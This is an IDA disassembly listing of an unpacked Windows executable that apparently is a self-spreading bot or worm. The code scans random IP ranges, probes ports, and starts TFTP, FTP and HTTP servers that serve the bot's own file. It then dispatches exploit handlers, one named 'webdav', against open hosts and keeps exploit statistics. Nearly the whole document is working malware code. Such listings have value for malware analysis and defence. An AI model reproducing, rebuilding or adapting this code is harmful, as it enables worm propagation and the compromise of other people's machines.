;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: SRI, 1 computer, std, 05/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : AA077CE2E66351270FA97634A3385125
; File Name : u:\work\aa077ce2e66351270fa97634a3385125_unpacked.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00082000 ( 532480.)
; Section size in file : 00082000 ( 532480.)
; Offset to raw data for section: 00001000
; Flags E0000020: Text Executable Readable Writable
; Alignment : default
unicode macro page,string,zero
irpc c,<string>
db '&c', page
endm
ifnb <zero>
dw zero
endif
endm
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Write/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_text, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
public start
start proc near ; CODE XREF: sub_409848+528C�p
var_400 = byte ptr -400h
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 400h
push ebx
push edi
lea eax, [ebp+var_200]
push offset aScanExploitSta ; "[SCAN]: Exploit Statistics:"
push eax
xor ebx, ebx
call sub_416975
cmp dword_42E068, ebx
pop ecx
pop ecx
mov edi, 200h
jz short loc_40106E
push esi
mov esi, offset dword_42E070
loc_401033: ; CODE XREF: start+6B�j
mov eax, [esi]
push eax
add ebx, eax
lea eax, [esi-26h]
push eax
lea eax, [ebp+var_400]
push offset aSD ; " %s: %d,"
push eax
call sub_416975
push edi
lea eax, [ebp+var_400]
push eax
lea eax, [ebp+var_200]
push eax
call sub_416840
add esi, 3Ch
add esp, 1Ch
cmp dword ptr [esi-8], 0
jnz short loc_401033
pop esi
loc_40106E: ; CODE XREF: start+2B�j
push dword_480AD8
call sub_4129E9
push eax
push ebx
lea eax, [ebp+var_400]
push offset aTotalDInS_ ; " Total: %d in %s."
push eax
call sub_416975
push edi
lea eax, [ebp+var_400]
push eax
lea eax, [ebp+var_200]
push eax
call sub_416840
push 0
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D62
lea eax, [ebp+var_200]
push eax
call sub_401F0F
add esp, 38h
pop edi
pop ebx
leave
retn
start endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010CA proc near ; CODE XREF: sub_409848+4BBB�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 200h
push 9
call sub_413922
test eax, eax
pop ecx
jle short loc_401106
mov eax, [ebp+arg_C]
push dword_4331E0[eax*8]
call dword_43A440 ; inet_ntoa
push eax
lea eax, [ebp+var_200]
push offset aScanCurrentIpS ; "[SCAN]: Current IP: %s."
push eax
call sub_416975
add esp, 0Ch
jmp short loc_401119
; ---------------------------------------------------------------------------
loc_401106: ; CODE XREF: sub_4010CA+13�j
lea eax, [ebp+var_200]
push offset aScanScanNotAct ; "[SCAN]: Scan not active."
push eax
call sub_416975
pop ecx
pop ecx
loc_401119: ; CODE XREF: sub_4010CA+3A�j
push 0
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D62
lea eax, [ebp+var_200]
push eax
call sub_401F0F
add esp, 18h
leave
retn
sub_4010CA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401141 proc near ; CODE XREF: sub_401B94+50�p
var_204 = byte ptr -204h
var_4 = byte ptr -4
arg_24 = byte ptr 2Ch
arg_A4 = byte ptr 0ACh
arg_124 = dword ptr 12Ch
arg_144 = dword ptr 14Ch
arg_14C = dword ptr 154h
arg_150 = dword ptr 158h
push ebp
mov ebp, esp
sub esp, 204h
mov eax, [ebp+arg_144]
cmp eax, 0FFFFFFFFh
jz locret_4014E8
imul eax, 3Ch
push ebx
xor ebx, ebx
cmp dword_42E074[eax], ebx
push esi
jz loc_4013D9
push 5
call sub_413922
test eax, eax
pop ecx
jnz loc_4014E6
mov eax, dword_42FCBC
push edi
push 104h
mov edi, offset dword_4347F4
push edi
push ebx
mov dword_434A04, eax
mov dword_434A00, ebx
call dword_422010 ; GetModuleFileNameA
push 103h
push offset byte_42FD4C
mov esi, offset dword_4348F8
push esi
call sub_416A00
mov eax, [ebp+arg_124]
add esp, 0Ch
cmp [ebp+arg_A4], bl
mov dword_4347F0, eax
mov eax, [ebp+arg_14C]
mov dword_434A88, eax
push 7Fh
jnz short loc_4011F1
lea eax, [ebp+arg_24]
push eax
push offset dword_434A08
call sub_416A00
mov dword_434A8C, 1
jmp short loc_401208
; ---------------------------------------------------------------------------
loc_4011F1: ; CODE XREF: sub_401141+94�j
lea eax, [ebp+arg_A4]
push eax
push offset dword_434A08
call sub_416A00
mov dword_434A8C, ebx
loc_401208: ; CODE XREF: sub_401141+AE�j
add esp, 0Ch
push esi
push edi
push dword_434A04
lea eax, [ebp+var_204]
push offset aTftpServerStar ; "[TFTP]: Server started on Port: %d, Fil"...
push eax
call sub_416975
push ebx
lea eax, [ebp+var_204]
push 5
push eax
call sub_413732
add esp, 20h
mov dword_4349FC, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_4347F0
push offset sub_41326A
push ebx
push ebx
call dword_42200C ; CreateThread
mov ecx, dword_4349FC
imul ecx, 234h
cmp eax, ebx
mov dword_43B274[ecx], eax
jnz loc_401321
call dword_422008 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_204]
push offset aTftpFailedToSt ; "[TFTP]: Failed to start server, error: "...
push eax
call sub_416975
add esp, 0Ch
loc_401287: ; CODE XREF: sub_401141+1E8�j
lea eax, [ebp+var_204]
push eax
call sub_401F0F
pop ecx
call dword_422004 ; GetTickCount
xor edx, edx
mov ecx, 0F82Fh
div ecx
push 104h
mov edi, offset dword_43454C
push edi
push ebx
mov dword_434758, ebx
add edx, 400h
mov dword_43475C, edx
call dword_422010 ; GetModuleFileNameA
push 103h
push offset byte_42FD4C
mov esi, offset dword_434650
push esi
call sub_416A00
mov eax, [ebp+arg_124]
add esp, 0Ch
cmp [ebp+arg_A4], bl
mov dword_434548, eax
mov eax, [ebp+arg_14C]
mov dword_4347E0, eax
push 7Fh
jnz short loc_40132E
lea eax, [ebp+arg_24]
push eax
push offset dword_434760
call sub_416A00
mov dword_4347E4, 1
jmp short loc_401345
; ---------------------------------------------------------------------------
loc_401319: ; CODE XREF: sub_401141+1E6�j
push 32h
call dword_422000 ; Sleep
loc_401321: ; CODE XREF: sub_401141+125�j
cmp dword_434A90, ebx
jz short loc_401319
jmp loc_401287
; ---------------------------------------------------------------------------
loc_40132E: ; CODE XREF: sub_401141+1BC�j
lea eax, [ebp+arg_A4]
push eax
push offset dword_434760
call sub_416A00
mov dword_4347E4, ebx
loc_401345: ; CODE XREF: sub_401141+1D6�j
add esp, 0Ch
push esi
push edi
push dword_43475C
push dword_434548
call sub_408894
pop ecx
push eax
lea eax, [ebp+var_204]
push offset aFtpServerStart ; "[FTP]: Server started on: %s:%d, File: "...
push eax
call sub_416975
push ebx
lea eax, [ebp+var_204]
push 6
push eax
call sub_413732
add esp, 24h
mov dword_434754, eax
lea eax, [ebp+var_4]
push eax
push ebx
push offset dword_434548
push offset sub_4042A2
push ebx
push ebx
call dword_42200C ; CreateThread
mov ecx, dword_434754
imul ecx, 234h
cmp eax, ebx
mov dword_43B274[ecx], eax
pop edi
jnz short loc_4013CC
call dword_422008 ; RtlGetLastWin32Error
push eax
push offset aFtpFailedToSta ; "[FTP]: Failed to start server, error: <"...
jmp loc_4014CA
; ---------------------------------------------------------------------------
loc_4013C4: ; CODE XREF: sub_401141+291�j
push 32h
call dword_422000 ; Sleep
loc_4013CC: ; CODE XREF: sub_401141+270�j
cmp dword_4347E8, ebx
jz short loc_4013C4
jmp loc_4014D9
; ---------------------------------------------------------------------------
loc_4013D9: ; CODE XREF: sub_401141+25�j
cmp dword_42E078[eax], ebx
jz loc_4014E6
push 4
call sub_413922
test eax, eax
pop ecx
jnz loc_4014E6
push 104h
mov esi, offset dword_434424
push esi
push ebx
call dword_422010 ; GetModuleFileNameA
push 5Ch
push esi
call sub_4169D0
cmp eax, ebx
pop ecx
pop ecx
jz short loc_401417
mov [eax], bl
loc_401417: ; CODE XREF: sub_401141+2D2�j
mov eax, dword_42FCC0
mov dword_434528, eax
lea eax, [ebp+arg_24]
push eax
push offset dword_43419C
mov dword_43453C, ebx
call sub_416975
mov eax, [ebp+arg_124]
pop ecx
pop ecx
mov ecx, [ebp+arg_14C]
push esi
push dword_434528
mov dword_434534, ecx
mov ecx, [ebp+arg_150]
push eax
mov dword_434198, eax
mov dword_434538, ecx
call sub_408894
pop ecx
push eax
lea eax, [ebp+var_204]
push offset aHttpdServerLis ; "[HTTPD]: Server listening on IP: %s:%d,"...
push eax
call sub_416975
push ebx
lea eax, [ebp+var_204]
push 4
push eax
call sub_413732
add esp, 20h
mov dword_434530, eax
lea eax, [ebp+var_4]
push eax
loc_401495: ; DATA XREF: .text:off_4317D8�o
; .text:off_432090�o
push ebx
push offset dword_434198
push offset sub_40558B
push ebx
push ebx
call dword_42200C ; CreateThread
mov ecx, dword_434530
imul ecx, 234h
cmp eax, ebx
mov dword_43B274[ecx], eax
jnz short loc_4014F2
call dword_422008 ; RtlGetLastWin32Error
push eax
push offset aHttpdFailedToS ; "[HTTPD]: Failed to start server, error:"...
loc_4014CA: ; CODE XREF: sub_401141+27E�j
lea eax, [ebp+var_204]
push eax
call sub_416975
add esp, 0Ch
loc_4014D9: ; CODE XREF: sub_401141+293�j
; sub_401141+3B9�j
lea eax, [ebp+var_204]
push eax
call sub_401F0F
pop ecx
loc_4014E6: ; CODE XREF: sub_401141+35�j
; sub_401141+29E�j ...
pop esi
pop ebx
locret_4014E8: ; CODE XREF: sub_401141+12�j
leave
retn
; ---------------------------------------------------------------------------
loc_4014EA: ; CODE XREF: sub_401141+3B7�j
push 32h
call dword_422000 ; Sleep
loc_4014F2: ; CODE XREF: sub_401141+37B�j
cmp dword_434544, ebx
jz short loc_4014EA
jmp short loc_4014D9
sub_401141 endp
; =============== S U B R O U T I N E =======================================
sub_4014FC proc near ; CODE XREF: sub_40195E:loc_4019C0�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
lea esi, ds:4331E0h[esi*8]
push dword ptr [esi]
call dword_43A494 ; ntohl
inc eax
push eax
call dword_43A4EC ; ntohl
mov [esi], eax
pop esi
retn
sub_4014FC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_40151C proc near ; CODE XREF: sub_4017E8+71�p
var_E4 = word ptr -0E4h
var_E2 = word ptr -0E2h
var_E0 = word ptr -0E0h
var_DE = word ptr -0DEh
var_DC = word ptr -0DCh
var_DA = word ptr -0DAh
var_D8 = word ptr -0D8h
var_D6 = word ptr -0D6h
var_D4 = word ptr -0D4h
var_D2 = word ptr -0D2h
var_D0 = word ptr -0D0h
var_CE = word ptr -0CEh
var_CC = word ptr -0CCh
var_CA = word ptr -0CAh
var_C8 = word ptr -0C8h
var_C6 = word ptr -0C6h
var_C4 = word ptr -0C4h
var_C2 = word ptr -0C2h
var_C0 = word ptr -0C0h
var_BE = word ptr -0BEh
var_BC = word ptr -0BCh
var_BA = word ptr -0BAh
var_B8 = word ptr -0B8h
var_B6 = word ptr -0B6h
var_B4 = word ptr -0B4h
var_B2 = word ptr -0B2h
var_B0 = word ptr -0B0h
var_AE = word ptr -0AEh
var_AC = word ptr -0ACh
var_AA = word ptr -0AAh
var_A8 = word ptr -0A8h
var_A6 = word ptr -0A6h
var_A4 = word ptr -0A4h
var_A2 = word ptr -0A2h
var_A0 = word ptr -0A0h
var_9E = word ptr -9Eh
var_9C = word ptr -9Ch
var_9A = word ptr -9Ah
var_98 = word ptr -98h
var_96 = word ptr -96h
var_94 = word ptr -94h
var_92 = word ptr -92h
var_90 = word ptr -90h
var_8E = word ptr -8Eh
var_8C = word ptr -8Ch
var_8A = word ptr -8Ah
var_88 = word ptr -88h
var_86 = word ptr -86h
var_84 = word ptr -84h
var_82 = word ptr -82h
var_80 = word ptr -80h
var_7E = word ptr -7Eh
var_7C = word ptr -7Ch
var_7A = word ptr -7Ah
var_78 = word ptr -78h
var_76 = word ptr -76h
var_74 = word ptr -74h
var_72 = word ptr -72h
var_70 = word ptr -70h
var_6E = word ptr -6Eh
var_6C = word ptr -6Ch
var_6A = word ptr -6Ah
var_68 = word ptr -68h
var_66 = word ptr -66h
var_64 = word ptr -64h
var_62 = word ptr -62h
var_60 = word ptr -60h
var_5E = word ptr -5Eh
var_5C = word ptr -5Ch
var_5A = word ptr -5Ah
var_58 = word ptr -58h
var_56 = word ptr -56h
var_54 = word ptr -54h
var_52 = word ptr -52h
var_50 = word ptr -50h
var_4E = word ptr -4Eh
var_4C = word ptr -4Ch
var_4A = word ptr -4Ah
var_48 = word ptr -48h
var_46 = word ptr -46h
var_44 = word ptr -44h
var_42 = word ptr -42h
var_40 = word ptr -40h
var_3E = word ptr -3Eh
var_3C = word ptr -3Ch
var_3A = word ptr -3Ah
var_38 = word ptr -38h
var_36 = word ptr -36h
var_34 = word ptr -34h
var_32 = word ptr -32h
var_30 = word ptr -30h
var_2E = word ptr -2Eh
var_2C = word ptr -2Ch
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = word ptr -24h
var_22 = word ptr -22h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = word ptr -18h
var_16 = word ptr -16h
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = word ptr -0Ch
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 0E4h
xor eax, eax
mov [ebp+74h+var_E4], ax
mov [ebp+74h+var_E2], 1
mov [ebp+74h+var_E0], 2
mov [ebp+74h+var_DE], 5
mov [ebp+74h+var_DC], 7
mov [ebp+74h+var_DA], 0Bh
mov [ebp+74h+var_D8], 17h
mov [ebp+74h+var_D6], 1Bh
mov [ebp+74h+var_D4], 1Fh
mov [ebp+74h+var_D2], 24h
mov [ebp+74h+var_D0], 25h
mov [ebp+74h+var_CE], 27h
mov [ebp+74h+var_CC], 29h
mov [ebp+74h+var_CA], 2Ah
mov [ebp+74h+var_C8], 31h
mov [ebp+74h+var_C6], 32h
mov [ebp+74h+var_C4], 49h
mov [ebp+74h+var_C2], 4Ah
mov [ebp+74h+var_C0], 4Bh
mov [ebp+74h+var_BE], 4Ch
mov [ebp+74h+var_BC], 4Dh
mov [ebp+74h+var_BA], 4Eh
mov [ebp+74h+var_B8], 4Fh
mov [ebp+74h+var_B6], 59h
mov [ebp+74h+var_B4], 5Ah
mov [ebp+74h+var_B2], 5Bh
mov [ebp+74h+var_B0], 5Ch
mov [ebp+74h+var_AE], 5Dh
mov [ebp+74h+var_AC], 5Eh
mov [ebp+74h+var_AA], 5Fh
mov [ebp+74h+var_A8], 60h
mov [ebp+74h+var_A6], 61h
mov [ebp+74h+var_A4], 62h
mov [ebp+74h+var_A2], 63h
mov [ebp+74h+var_A0], 64h
mov [ebp+74h+var_9E], 65h
mov [ebp+74h+var_9C], 66h
mov [ebp+74h+var_9A], 67h
mov [ebp+74h+var_98], 68h
mov [ebp+74h+var_96], 69h
mov [ebp+74h+var_94], 6Ah
mov [ebp+74h+var_92], 6Bh
mov [ebp+74h+var_90], 6Ch
mov [ebp+74h+var_8E], 6Dh
mov [ebp+74h+var_8C], 6Eh
mov [ebp+74h+var_8A], 6Fh
mov [ebp+74h+var_88], 70h
mov [ebp+74h+var_86], 71h
mov [ebp+74h+var_84], 72h
mov [ebp+74h+var_82], 73h
mov [ebp+74h+var_80], 74h
mov [ebp+74h+var_7E], 75h
mov [ebp+74h+var_7C], 76h
mov [ebp+74h+var_7A], 77h
mov [ebp+74h+var_78], 78h
mov [ebp+74h+var_76], 79h
mov [ebp+74h+var_74], 7Ah
mov [ebp+74h+var_72], 7Bh
mov [ebp+74h+var_70], 7Ch
mov [ebp+74h+var_6E], 7Dh
mov [ebp+74h+var_6C], 7Eh
mov [ebp+74h+var_6A], 7Fh
mov [ebp+74h+var_68], 0ADh
mov [ebp+74h+var_66], 0AEh
mov [ebp+74h+var_64], 0AFh
mov [ebp+74h+var_62], 0B0h
mov [ebp+74h+var_60], 0B1h
mov [ebp+74h+var_5E], 0B2h
mov [ebp+74h+var_5C], 0B3h
mov [ebp+74h+var_5A], 0B4h
mov [ebp+74h+var_58], 0B5h
mov [ebp+74h+var_56], 0B6h
mov [ebp+74h+var_54], 0B7h
mov [ebp+74h+var_52], 0B8h
mov [ebp+74h+var_50], 0B9h
mov [ebp+74h+var_4E], 0BAh
mov [ebp+74h+var_4C], 0BBh
mov [ebp+74h+var_4A], 0BDh
mov [ebp+74h+var_48], 0BEh
mov [ebp+74h+var_46], 0C5h
mov [ebp+74h+var_44], 0DFh
mov [ebp+74h+var_42], 0E0h
mov [ebp+74h+var_40], 0E1h
mov [ebp+74h+var_3E], 0E2h
mov [ebp+74h+var_3C], 0E3h
mov [ebp+74h+var_3A], 0E4h
mov [ebp+74h+var_38], 0E5h
mov [ebp+74h+var_36], 0E6h
mov [ebp+74h+var_34], 0E7h
mov [ebp+74h+var_32], 0E8h
mov [ebp+74h+var_30], 0E9h
mov [ebp+74h+var_2E], 0EAh
mov [ebp+74h+var_2C], 0EBh
mov [ebp+74h+var_2A], 0ECh
mov [ebp+74h+var_28], 0EDh
mov [ebp+74h+var_26], 0EEh
mov [ebp+74h+var_24], 0EFh
mov [ebp+74h+var_22], 0F0h
mov [ebp+74h+var_20], 0F1h
mov [ebp+74h+var_1E], 0F2h
mov [ebp+74h+var_1C], 0F3h
mov [ebp+74h+var_1A], 0F4h
mov [ebp+74h+var_18], 0F5h
mov [ebp+74h+var_16], 0F6h
mov [ebp+74h+var_14], 0F7h
mov [ebp+74h+var_12], 0F8h
mov [ebp+74h+var_10], 0F9h
mov [ebp+74h+var_E], 0FAh
mov [ebp+74h+var_C], 0FBh
mov [ebp+74h+var_A], 0FCh
mov [ebp+74h+var_8], 0FDh
mov [ebp+74h+var_6], 0FEh
mov [ebp+74h+var_4], 0FFh
loc_4017CD: ; CODE XREF: sub_40151C+2BF�j
movsx ecx, [ebp+eax*2+74h+var_E4]
cmp [ebp+74h+arg_0], ecx
jz short loc_4017E4
inc eax
cmp eax, 71h
jb short loc_4017CD
xor al, al
loc_4017DF: ; CODE XREF: sub_40151C+2CA�j
add ebp, 74h
leave
retn
; ---------------------------------------------------------------------------
loc_4017E4: ; CODE XREF: sub_40151C+2B9�j
mov al, 1
jmp short loc_4017DF
sub_40151C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4017E8 proc near ; CODE XREF: sub_40195E+5A�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
mov eax, [ebp+arg_0]
push edi
or edi, 0FFFFFFFFh
mov [ebp+var_4], edi
mov [ebp+var_C], edi
mov [ebp+var_8], edi
mov [ebp+var_10], edi
lea ecx, [eax+1]
loc_401804: ; CODE XREF: sub_4017E8+21�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_401804
sub eax, ecx
cmp eax, 0Fh
jbe short loc_401819
xor eax, eax
jmp loc_4018BE
; ---------------------------------------------------------------------------
loc_401819: ; CODE XREF: sub_4017E8+28�j
push esi
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_4]
push eax
push offset aD_D_D_D ; "%d.%d.%d.%d"
push [ebp+arg_0]
call sub_416B53
add esp, 18h
cmp [ebp+var_4], edi
jnz short loc_401863
call sub_416B31
mov esi, 0FFh
jmp short loc_401850
; ---------------------------------------------------------------------------
loc_40184B: ; CODE XREF: sub_4017E8+79�j
call sub_416B31
loc_401850: ; CODE XREF: sub_4017E8+61�j
cdq
mov ecx, esi
idiv ecx
push edx
mov [ebp+var_4], edx
call sub_40151C
test al, al
pop ecx
jnz short loc_40184B
loc_401863: ; CODE XREF: sub_4017E8+55�j
cmp [ebp+var_C], edi
mov esi, 100h
jnz short loc_40187A
call sub_416B31
cdq
mov ecx, esi
idiv ecx
mov [ebp+var_C], edx
loc_40187A: ; CODE XREF: sub_4017E8+83�j
cmp [ebp+var_8], edi
jnz short loc_40188A
call sub_416B31
cdq
idiv esi
mov [ebp+var_8], edx
loc_40188A: ; CODE XREF: sub_4017E8+95�j
mov edx, [ebp+var_10]
cmp edx, edi
pop esi
jnz short loc_4018A0
call sub_416B31
cdq
mov ecx, 0FEh
idiv ecx
inc edx
loc_4018A0: ; CODE XREF: sub_4017E8+A8�j
mov eax, [ebp+var_4]
mov ecx, [ebp+arg_4]
shl edx, 8
add edx, [ebp+var_8]
shl edx, 8
add edx, [ebp+var_C]
shl edx, 8
add eax, edx
mov dword_4331E0[ecx*8], eax
loc_4018BE: ; CODE XREF: sub_4017E8+2C�j
pop edi
leave
retn
sub_4017E8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4018C1 proc near ; CODE XREF: sub_40195E+A9�p
; sub_40402D+2C�p
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_1C = word ptr -1Ch
var_1A = word ptr -1Ah
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 120h
push ebx
push esi
push edi
xor edi, edi
xor ebx, ebx
push ebx
inc edi
push edi
push 2
mov [ebp+var_4], edi
call dword_43A3BC ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jnz short loc_4018EA
xor eax, eax
jmp short loc_401959
; ---------------------------------------------------------------------------
loc_4018EA: ; CODE XREF: sub_4018C1+23�j
mov eax, [ebp+arg_0]
push [ebp+arg_4]
mov [ebp+var_1C], 2
mov [ebp+var_18], eax
call dword_43A514 ; ntohs
mov [ebp+var_1A], ax
lea eax, [ebp+var_4]
push eax
push 8004667Eh
push esi
call dword_43A354 ; ioctlsocket
push 10h
lea eax, [ebp+var_1C]
push eax
push esi
call dword_43A36C ; connect
mov eax, [ebp+arg_8]
mov [ebp+var_C], eax
lea eax, [ebp+var_C]
push eax
push ebx
lea eax, [ebp+var_120]
push eax
push ebx
push ebx
mov [ebp+var_8], ebx
mov [ebp+var_11C], esi
mov [ebp+var_120], edi
call dword_43A468 ; select
push esi
mov edi, eax
call dword_43A4D0 ; closesocket
xor eax, eax
cmp edi, ebx
setnle al
loc_401959: ; CODE XREF: sub_4018C1+27�j
pop edi
pop esi
pop ebx
leave
retn
sub_4018C1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40195E proc near ; DATA XREF: sub_401B94+14E�o
var_2D0 = dword ptr -2D0h
var_2B4 = byte ptr -2B4h
var_234 = dword ptr -234h
var_230 = byte ptr -230h
var_220 = byte ptr -220h
var_210 = dword ptr -210h
var_20C = byte ptr -20Ch
var_18C = byte ptr -18Ch
var_180 = dword ptr -180h
var_17C = dword ptr -17Ch
var_178 = dword ptr -178h
var_170 = dword ptr -170h
var_16C = dword ptr -16Ch
var_164 = byte ptr -164h
var_154 = byte ptr -154h
var_144 = dword ptr -144h
var_140 = byte ptr -140h
var_C0 = byte ptr -0C0h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 2B4h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 58h
mov esi, eax
pop ecx
lea edi, [ebp+var_164]
rep movsd
mov edi, [ebp+var_2C]
mov dword ptr [eax+15Ch], 1
mov eax, [ebp+var_28]
mov [ebp+var_4], edi
mov [ebp+arg_0], eax
call dword_422004 ; GetTickCount
push eax
call sub_416B24
mov ebx, edi
pop ecx
imul ebx, 234h
jmp loc_401B70
; ---------------------------------------------------------------------------
loc_4019AA: ; CODE XREF: sub_40195E+220�j
cmp [ebp+var_10], 0
push eax
jz short loc_4019C0
lea eax, [ebp+var_164]
push eax
call sub_4017E8
pop ecx
jmp short loc_4019C5
; ---------------------------------------------------------------------------
loc_4019C0: ; CODE XREF: sub_40195E+51�j
call sub_4014FC
loc_4019C5: ; CODE XREF: sub_40195E+60�j
pop ecx
push [ebp+arg_0]
mov esi, eax
push dword_43B264[ebx]
push [ebp+var_3C]
push esi
call dword_43A440 ; inet_ntoa
push eax
lea eax, [ebp+var_2B4]
push offset aScanIpSDScanTh ; "[SCAN]: IP: %s:%d, Scan thread: %d, Sub"...
push eax
call sub_416975
lea eax, [ebp+var_2B4]
push eax
lea eax, dword_43B060[ebx]
push eax
call sub_416975
push [ebp+var_38]
push [ebp+var_3C]
push esi
call sub_4018C1
add esp, 2Ch
cmp eax, 1
jnz loc_401B65
cmp [ebp+var_20], 0FFFFFFFFh
jnz short loc_401A99
push offset dword_434180
call dword_42201C ; RtlEnterCriticalSection
push [ebp+var_3C]
push esi
call dword_43A440 ; inet_ntoa
push eax
lea eax, [ebp+var_2B4]
push offset aScanIpSPortDIs ; "[SCAN]: IP: %s, Port %d is open."
push eax
call sub_416975
add esp, 10h
cmp [ebp+var_14], 0
jnz short loc_401A7B
cmp [ebp+var_C0], 0
push 1
push [ebp+var_18]
lea eax, [ebp+var_2B4]
push eax
lea eax, [ebp+var_C0]
jnz short loc_401A6F
lea eax, [ebp+var_140]
loc_401A6F: ; CODE XREF: sub_40195E+109�j
push eax
push [ebp+var_40]
call sub_405D62
add esp, 14h
loc_401A7B: ; CODE XREF: sub_40195E+EE�j
lea eax, [ebp+var_2B4]
push eax
call sub_401F0F
mov [esp+2D0h+var_2D0], offset dword_434180
call dword_422018 ; RtlLeaveCriticalSection
jmp loc_401B65
; ---------------------------------------------------------------------------
loc_401A99: ; CODE XREF: sub_40195E+BE�j
push esi
call dword_43A440 ; inet_ntoa
push eax
lea eax, [ebp+var_230]
push eax
call sub_416975
mov eax, [ebp+var_20]
imul eax, 3Ch
add eax, offset aWebdav ; "webdav"
push eax
lea eax, [ebp+var_18C]
push eax
call sub_416975
add esp, 10h
cmp [ebp+var_C0], 0
lea eax, [ebp+var_C0]
jnz short loc_401ADD
lea eax, [ebp+var_140]
loc_401ADD: ; CODE XREF: sub_40195E+177�j
push eax
lea eax, [ebp+var_20C]
push eax
call sub_416975
mov eax, [ebp+var_144]
pop ecx
mov [ebp+var_210], eax
pop ecx
xor eax, eax
loc_401AFA: ; CODE XREF: sub_40195E+1AD�j
mov cl, [ebp+eax+var_154]
mov [ebp+eax+var_220], cl
inc eax
test cl, cl
jnz short loc_401AFA
mov eax, [ebp+var_40]
mov [ebp+var_234], eax
mov eax, [ebp+var_18]
mov [ebp+var_170], eax
mov eax, [ebp+var_14]
mov [ebp+var_16C], eax
mov eax, [ebp+var_3C]
mov [ebp+var_180], eax
mov eax, [ebp+var_20]
mov [ebp+var_178], eax
imul eax, 3Ch
sub esp, 0D0h
push 34h
pop ecx
mov [ebp+var_17C], edi
lea esi, [ebp+var_234]
mov edi, esp
rep movsd
call off_42E06C[eax]
mov edi, [ebp+var_4]
add esp, 0D0h
loc_401B65: ; CODE XREF: sub_40195E+B4�j
; sub_40195E+136�j
push 7D0h
call dword_422000 ; Sleep
loc_401B70: ; CODE XREF: sub_40195E+47�j
mov eax, dword_43B264[ebx]
cmp dword_4331E4[eax*8], 0
jnz loc_4019AA
push edi
call sub_4139F6
pop ecx
push 0
call dword_422014 ; ExitThread
int 3 ; Trap to Debugger
sub_40195E endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401B94 proc near ; DATA XREF: sub_409848+4627�o
; sub_409848+6052�o
var_220 = dword ptr -220h
var_1E0 = byte ptr -1E0h
var_160 = byte ptr -160h
var_140 = dword ptr -140h
var_13C = byte ptr -13Ch
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 1E0h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 58h
pop ecx
mov esi, eax
lea edi, [ebp+var_160]
rep movsd
mov dword ptr [eax+158h], 1
lea eax, [ebp+var_160]
push eax
call dword_43A434 ; inet_addr
mov ecx, [ebp+var_2C]
sub esp, 160h
